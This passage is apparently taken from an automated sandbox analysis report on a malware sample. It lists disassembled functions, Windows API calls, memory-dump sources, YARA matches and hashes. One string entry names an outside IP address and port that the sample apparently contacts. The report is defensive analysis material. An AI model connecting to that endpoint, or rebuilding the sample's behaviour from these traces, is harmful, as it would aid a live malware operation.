                                                                                                  • std::exception::exception.LIBCMT ref: 02D0F756
                                                                                                  • std::exception::exception.LIBCMT ref: 02D0F770
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 02D0F781
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                                                  • String ID: bad allocation
                                                                                                  • API String ID: 615853336-2104205924
                                                                                                  • Opcode ID: fed0cb684fcfc7d4d48fb4fe011467ff98a3236fb2758ce95c751346d957c285
                                                                                                  • Instruction ID: 55e65d6aa14ad4ac155c92ba5f378c1e8bc57035a8bdb0f892f23d4ff95a7f5a
                                                                                                  • Opcode Fuzzy Hash: fed0cb684fcfc7d4d48fb4fe011467ff98a3236fb2758ce95c751346d957c285
                                                                                                  • Instruction Fuzzy Hash: 41F0D6719002196EDB24EB55E865B6E37BAEB50708F644499E80496BE0DF70DD0CCEA1
                                                                                                  Function 02D02D30 Relevance: 7.5, APIs: 5, Instructions: 36COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 02D02D5C
                                                                                                  • CancelIo.KERNEL32(?), ref: 02D02D66
                                                                                                  • InterlockedExchange.KERNEL32(00000000,00000000), ref: 02D02D6F
                                                                                                  • closesocket.WS2_32(?), ref: 02D02D79
                                                                                                  • SetEvent.KERNEL32(00000001), ref: 02D02D83
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
                                                                                                  • String ID:
                                                                                                  • API String ID: 1486965892-0
                                                                                                  • Opcode ID: 4b9c3f0fdc3bf6c867ef38b534f3ba9ce2676e3e8a5b46eea4a7a3e0766093a4
                                                                                                  • Instruction ID: 2bad0657d1cf6c14f9e46f86ed61e8de549fdfcb604755f5db71ffe61a682e3d
                                                                                                  • Opcode Fuzzy Hash: 4b9c3f0fdc3bf6c867ef38b534f3ba9ce2676e3e8a5b46eea4a7a3e0766093a4
                                                                                                  • Instruction Fuzzy Hash: 83F03C76540700ABD3349F54DD4DF6677B8BB59B11F104A1DFA9296780C6B0B9188BA0
                                                                                                  Function 00972D10 Relevance: 7.5, APIs: 5, Instructions: 36COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 00972D3C
                                                                                                  • CancelIo.KERNEL32(?), ref: 00972D46
                                                                                                  • InterlockedExchange.KERNEL32(00000000,00000000), ref: 00972D4F
                                                                                                  • closesocket.WS2_32(?), ref: 00972D59
                                                                                                  • SetEvent.KERNEL32(00000001), ref: 00972D63
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
                                                                                                  • String ID:
                                                                                                  • API String ID: 1486965892-0
                                                                                                  • Opcode ID: 56dfc91c780f1f3883a747f7969516ca71f6f1b64d5cb18db363b90349504f01
                                                                                                  • Instruction ID: 01d92741f052963097213b073a346508ecb312605e0d9aa331371d63175ba3b6
                                                                                                  • Opcode Fuzzy Hash: 56dfc91c780f1f3883a747f7969516ca71f6f1b64d5cb18db363b90349504f01
                                                                                                  • Instruction Fuzzy Hash: 9FF04976114B00ABD3309F94DC49F6A77B8FB89B11F104A5CF68697790CBB0B9089BA0
                                                                                                  Function 00976F17 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • _malloc.LIBCMT ref: 00976F31
                                                                                                    • Part of subcall function 00976E83: __FF_MSGBANNER.LIBCMT ref: 00976E9C
                                                                                                    • Part of subcall function 00976E83: __NMSG_WRITE.LIBCMT ref: 00976EA3
                                                                                                    • Part of subcall function 00976E83: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00979FB0,00000000,00000001,00000000,?,0097C0CF,00000018,00987C70,0000000C,0097C15F), ref: 00976EC8
                                                                                                  • std::exception::exception.LIBCMT ref: 00976F66
                                                                                                  • std::exception::exception.LIBCMT ref: 00976F80
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 00976F91
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 615853336-0
                                                                                                  • Opcode ID: 9973c3bffe9ea60318eb41bde691b0736a273b98623d6fe9db1c1a200da3ab72
                                                                                                  • Instruction ID: b66aeedf10305bb7de5c862a5d2947769d1d214c33bfe1305fbda603df652104
                                                                                                  • Opcode Fuzzy Hash: 9973c3bffe9ea60318eb41bde691b0736a273b98623d6fe9db1c1a200da3ab72
                                                                                                  • Instruction Fuzzy Hash: 4CF02837614A09AFEB10FBA4EC02B9D7AAA9F80714F10801AF40CD62D1DBB0CE44DB56
                                                                                                  Function 02D06EBC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 8registryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • RegCloseKey.ADVAPI32(80000001,02D06E9A), ref: 02D06EC9
                                                                                                  • RegCloseKey.ADVAPI32(s<u), ref: 02D06ED2
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Close
                                                                                                  • String ID: s<u
                                                                                                  • API String ID: 3535843008-779365171
                                                                                                  • Opcode ID: 6b376c4bfb73f7743e85cb68b3bb4f34bc7414d21d6d0b59e64f607c041565da
                                                                                                  • Instruction ID: 77f4bac27717593805135027ca3701ac464cf3c688117a6563c6ced0db2b84a4
                                                                                                  • Opcode Fuzzy Hash: 6b376c4bfb73f7743e85cb68b3bb4f34bc7414d21d6d0b59e64f607c041565da
                                                                                                  • Instruction Fuzzy Hash: BAC09B72D0103857CF10E7A4FD4894D77B85F4C210F1145C2B504A3114C634BD41CF90
                                                                                                  Function 02D03160 Relevance: 4.6, APIs: 3, Instructions: 88threadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 02D0316B
                                                                                                  • InterlockedExchange.KERNEL32(?,00000001), ref: 02D03183
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 02D0322F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CurrentThread$ExchangeInterlocked
                                                                                                  • String ID:
                                                                                                  • API String ID: 4033114805-0
                                                                                                  • Opcode ID: f1ecd33e49a94aa45c69d77836592475a6e01a66113cbf76a61494f194f6acb9
                                                                                                  • Instruction ID: ced489937d412628d1f9a7796a27a0fdcf3f0d0d5da053e14e35603f178eb08c
                                                                                                  • Opcode Fuzzy Hash: f1ecd33e49a94aa45c69d77836592475a6e01a66113cbf76a61494f194f6acb9
                                                                                                  • Instruction Fuzzy Hash: 26314670200602AFC768DF69C9C4B6AB3E5FF48708B10C56DE85A8B7A5D771EC51CB91
                                                                                                  Function 02D011B0 Relevance: 4.6, APIs: 3, Instructions: 76memoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __floor_pentium4.LIBCMT ref: 02D011E9
                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 02D01226
                                                                                                  • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02D01255
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Virtual$AllocFree__floor_pentium4
                                                                                                  • String ID:
                                                                                                  • API String ID: 2605973128-0
                                                                                                  • Opcode ID: 3aaec9788ee57d44f4d271aaa7ecbe7045f5e4910f6fad26b87e719e0f1545cd
                                                                                                  • Instruction ID: a4a4812e07871491258291c11c581ea13f32393b781bb29baebabee5a8384371
                                                                                                  • Opcode Fuzzy Hash: 3aaec9788ee57d44f4d271aaa7ecbe7045f5e4910f6fad26b87e719e0f1545cd
                                                                                                  • Instruction Fuzzy Hash: 75219271E00709AFDB249FA9E885B6EF7F4EF44705F008569E84DE2790E670AC148B51
                                                                                                  Function 009711B0 Relevance: 4.6, APIs: 3, Instructions: 76memoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __floor_pentium4.LIBCMT ref: 009711E9
                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00971226
                                                                                                  • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00971255
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Virtual$AllocFree__floor_pentium4
                                                                                                  • String ID:
                                                                                                  • API String ID: 2605973128-0
                                                                                                  • Opcode ID: 126e166b8b9b11dc1869ac7291afdf89baa1f0409d9f477049fbd4e21fa3b3f5
                                                                                                  • Instruction ID: 3c10f9f00cadd373a33031bc620ad6f195cbc131be260f6be4a381a464849682
                                                                                                  • Opcode Fuzzy Hash: 126e166b8b9b11dc1869ac7291afdf89baa1f0409d9f477049fbd4e21fa3b3f5
                                                                                                  • Instruction Fuzzy Hash: 8F21CF72A04709ABDB149FADDC86B6EFBF8EF40705F10C5ADE95DE2640E630A8008751
                                                                                                  Function 02D01100 Relevance: 4.6, APIs: 3, Instructions: 66memoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __floor_pentium4.LIBCMT ref: 02D0112F
                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 02D0115F
                                                                                                  • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02D01192
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Virtual$AllocFree__floor_pentium4
                                                                                                  • String ID:
                                                                                                  • API String ID: 2605973128-0
                                                                                                  • Opcode ID: c2533342c85629fdeca15a763f0bdad1ac58b6109bc4404a987824829ac8903a
                                                                                                  • Instruction ID: 055d993186f1094896e4701873c922ec2f365d7ee24c5c2f99f1b40beecb5a95
                                                                                                  • Opcode Fuzzy Hash: c2533342c85629fdeca15a763f0bdad1ac58b6109bc4404a987824829ac8903a
                                                                                                  • Instruction Fuzzy Hash: A811AF70E40308AFDB149FA9D885B6EFBB8FF04705F008569E959E2390E670AD148B11
                                                                                                  Function 00971100 Relevance: 4.6, APIs: 3, Instructions: 66memoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __floor_pentium4.LIBCMT ref: 0097112F
                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0097115F
                                                                                                  • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00971192
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Virtual$AllocFree__floor_pentium4
                                                                                                  • String ID:
                                                                                                  • API String ID: 2605973128-0
                                                                                                  • Opcode ID: 4200f38beb6276126e8f76241b98dc604ea19d72ea612c98faa70bc4b9b8f6d0
                                                                                                  • Instruction ID: 743f03f7f2589a6785c7120eefa13c0fab3bb6693049c077085c16fc500c0d90
                                                                                                  • Opcode Fuzzy Hash: 4200f38beb6276126e8f76241b98dc604ea19d72ea612c98faa70bc4b9b8f6d0
                                                                                                  • Instruction Fuzzy Hash: 0F11D372A08709ABDB109FADDC86B6EFBF8FF44705F108469E95DE6240E670A8048751
                                                                                                  Function 02D09DE0 Relevance: 4.5, APIs: 3, Instructions: 39windowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 02D09E04
                                                                                                  • GdipDisposeImage.GDIPLUS(?), ref: 02D09E18
                                                                                                  • GdipDisposeImage.GDIPLUS(?), ref: 02D09E3B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Gdip$DisposeImage$BitmapCreateFromStream
                                                                                                  • String ID:
                                                                                                  • API String ID: 800915452-0
                                                                                                  • Opcode ID: e827c367a791c27e7dd8dbaa0839d4eaf0f9d9adce130e50af1731411c63a6d1
                                                                                                  • Instruction ID: 8ade01b92b50b759ccf46076128c231bdab070e2a3aa440848152fbc16316369
                                                                                                  • Opcode Fuzzy Hash: e827c367a791c27e7dd8dbaa0839d4eaf0f9d9adce130e50af1731411c63a6d1
                                                                                                  • Instruction Fuzzy Hash: 57F0A471D01229978B10EF94DA488EEB779EB54B15B01455EFC05A7350D7305F19CBE0
                                                                                                  Function 02D09AC0 Relevance: 4.5, APIs: 3, Instructions: 36COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • EnterCriticalSection.KERNEL32(02D2FB64), ref: 02D09ADC
                                                                                                  • GdiplusStartup.GDIPLUS(02D2FB60,?,?), ref: 02D09B15
                                                                                                  • LeaveCriticalSection.KERNEL32(02D2FB64), ref: 02D09B26
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CriticalSection$EnterGdiplusLeaveStartup
                                                                                                  • String ID:
                                                                                                  • API String ID: 389129658-0
                                                                                                  • Opcode ID: 0f9491aa45dc20231f80c29c67473a84f2bef3fafc8ba4b666fc77d90d295b08
                                                                                                  • Instruction ID: 8693228db74b4ac036869a641cdfb452a196dbb203d8e0503000d076aeedc667
                                                                                                  • Opcode Fuzzy Hash: 0f9491aa45dc20231f80c29c67473a84f2bef3fafc8ba4b666fc77d90d295b08
                                                                                                  • Instruction Fuzzy Hash: E6F02B31D812099FEB109FD5E8BA7EA77B8F714709F400A99E80552380C7720D5CCBD1
                                                                                                  Function 00973200 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 15sleepCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Sleep
                                                                                                  • String ID: 8.217.85.20$9091
                                                                                                  • API String ID: 3472027048-631352039
                                                                                                  • Opcode ID: 1dfaaba67fdfb61fbc9347a035604eefe8d14a08e8e690717fdd83b75b12fab0
                                                                                                  • Instruction ID: 3bd25ad8b15b3deda32dda516146b078e8951d1f8f6cfd6d8c771de88ab16944
                                                                                                  • Opcode Fuzzy Hash: 1dfaaba67fdfb61fbc9347a035604eefe8d14a08e8e690717fdd83b75b12fab0
                                                                                                  • Instruction Fuzzy Hash: AFD022B1A18522DB8E04AB00C86543BB374BAC03147284908F89F973C0C3A86C08ABA2
                                                                                                  Function 02D0F964 Relevance: 4.5, APIs: 3, Instructions: 11threadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __getptd_noexit.LIBCMT ref: 02D0F969
                                                                                                    • Part of subcall function 02D13DE2: GetLastError.KERNEL32(00000001,00000000,02D0F920,02D0F6FC,00000000,?,02D14500,00000000,00000001,00000000,?,02D18DE6,00000018,02D26448,0000000C,02D18E76), ref: 02D13DE6
                                                                                                    • Part of subcall function 02D13DE2: ___set_flsgetvalue.LIBCMT ref: 02D13DF4
                                                                                                    • Part of subcall function 02D13DE2: __calloc_crt.LIBCMT ref: 02D13E08
                                                                                                    • Part of subcall function 02D13DE2: DecodePointer.KERNEL32(00000000,?,02D14500,00000000,00000001,00000000,?,02D18DE6,00000018,02D26448,0000000C,02D18E76,00000000,00000000,?,02D13F06), ref: 02D13E22
                                                                                                    • Part of subcall function 02D13DE2: GetCurrentThreadId.KERNEL32 ref: 02D13E38
                                                                                                    • Part of subcall function 02D13DE2: SetLastError.KERNEL32(00000000,?,02D14500,00000000,00000001,00000000,?,02D18DE6,00000018,02D26448,0000000C,02D18E76,00000000,00000000,?,02D13F06), ref: 02D13E50
                                                                                                  • __freeptd.LIBCMT ref: 02D0F973
                                                                                                    • Part of subcall function 02D13FA6: TlsGetValue.KERNEL32(?,?,02D110F0,00000000,02D26278,00000008,02D11155,?,?,?,02D26298,0000000C,02D11210,?), ref: 02D13FC7
                                                                                                    • Part of subcall function 02D13FA6: TlsGetValue.KERNEL32(?,?,02D110F0,00000000,02D26278,00000008,02D11155,?,?,?,02D26298,0000000C,02D11210,?), ref: 02D13FD9
                                                                                                    • Part of subcall function 02D13FA6: DecodePointer.KERNEL32(00000000,?,02D110F0,00000000,02D26278,00000008,02D11155,?,?,?,02D26298,0000000C,02D11210,?), ref: 02D13FEF
                                                                                                    • Part of subcall function 02D13FA6: __freefls@4.LIBCMT ref: 02D13FFA
                                                                                                    • Part of subcall function 02D13FA6: TlsSetValue.KERNEL32(00000027,00000000,?,02D110F0,00000000,02D26278,00000008,02D11155,?,?,?,02D26298,0000000C,02D11210,?), ref: 02D1400C
                                                                                                  • ExitThread.KERNEL32 ref: 02D0F97C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Value$DecodeErrorLastPointerThread$CurrentExit___set_flsgetvalue__calloc_crt__freefls@4__freeptd__getptd_noexit
                                                                                                  • String ID:
                                                                                                  • API String ID: 4224061863-0
                                                                                                  • Opcode ID: 2724e5c2700f713393ca01cb1d1fa8083a8d834bd76ca7655ed9195569bfad4b
                                                                                                  • Instruction ID: 26da360c72ab7463584a4421ed6b4a6a2c0a8a51df23680d90786dc52b529026
                                                                                                  • Opcode Fuzzy Hash: 2724e5c2700f713393ca01cb1d1fa8083a8d834bd76ca7655ed9195569bfad4b
                                                                                                  • Instruction Fuzzy Hash: A1C04C214443457F9B643771A90DA1A3A5EDED0350B654460BC0585B90DE75DC51C9A0
                                                                                                  Function 00977156 Relevance: 4.5, APIs: 3, Instructions: 11threadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __getptd_noexit.LIBCMT ref: 0097715B
                                                                                                    • Part of subcall function 00979896: GetLastError.KERNEL32(00000001,00000000,00977112,00976F0C,00000000,?,00979FB0,00000000,00000001,00000000,?,0097C0CF,00000018,00987C70,0000000C,0097C15F), ref: 0097989A
                                                                                                    • Part of subcall function 00979896: ___set_flsgetvalue.LIBCMT ref: 009798A8
                                                                                                    • Part of subcall function 00979896: __calloc_crt.LIBCMT ref: 009798BC
                                                                                                    • Part of subcall function 00979896: DecodePointer.KERNEL32(00000000,?,00979FB0,00000000,00000001,00000000,?,0097C0CF,00000018,00987C70,0000000C,0097C15F,00000000,00000000,?,009799BA), ref: 009798D6
                                                                                                    • Part of subcall function 00979896: GetCurrentThreadId.KERNEL32 ref: 009798EC
                                                                                                    • Part of subcall function 00979896: SetLastError.KERNEL32(00000000,?,00979FB0,00000000,00000001,00000000,?,0097C0CF,00000018,00987C70,0000000C,0097C15F,00000000,00000000,?,009799BA), ref: 00979904
                                                                                                  • __freeptd.LIBCMT ref: 00977165
                                                                                                    • Part of subcall function 00979A58: TlsGetValue.KERNEL32(?,?,00977711,00000000,00987B60,00000008,00977776,?,?,?,00987B80,0000000C,00977831,?), ref: 00979A79
                                                                                                    • Part of subcall function 00979A58: TlsGetValue.KERNEL32(?,?,00977711,00000000,00987B60,00000008,00977776,?,?,?,00987B80,0000000C,00977831,?), ref: 00979A8B
                                                                                                    • Part of subcall function 00979A58: DecodePointer.KERNEL32(00000000,?,00977711,00000000,00987B60,00000008,00977776,?,?,?,00987B80,0000000C,00977831,?), ref: 00979AA1
                                                                                                    • Part of subcall function 00979A58: __freefls@4.LIBCMT ref: 00979AAC
                                                                                                    • Part of subcall function 00979A58: TlsSetValue.KERNEL32(00000025,00000000,?,00977711,00000000,00987B60,00000008,00977776,?,?,?,00987B80,0000000C,00977831,?), ref: 00979ABE
                                                                                                  • ExitThread.KERNEL32 ref: 0097716E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Value$DecodeErrorLastPointerThread$CurrentExit___set_flsgetvalue__calloc_crt__freefls@4__freeptd__getptd_noexit
                                                                                                  • String ID:
                                                                                                  • API String ID: 4224061863-0
                                                                                                  • Opcode ID: adaf7ed63ff1584fce545b7ac8fa31d89d2c64eb1dc9d0dde25c5ce84baf2482
                                                                                                  • Instruction ID: cb0fb9f62386b5522bca4ffa94e07e59b37b46bd3e366bce92f3e3bfc437e713
                                                                                                  • Opcode Fuzzy Hash: adaf7ed63ff1584fce545b7ac8fa31d89d2c64eb1dc9d0dde25c5ce84baf2482
                                                                                                  • Instruction Fuzzy Hash: BCC08C32008A086ACA1077768C0EA4A3A4DCAC1310B918010B90C86111DE20D8008251
                                                                                                  Function 028201CB Relevance: 3.3, APIs: 2, Instructions: 267memoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 0282022B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3787310787.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2820000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocVirtual
                                                                                                  • String ID:
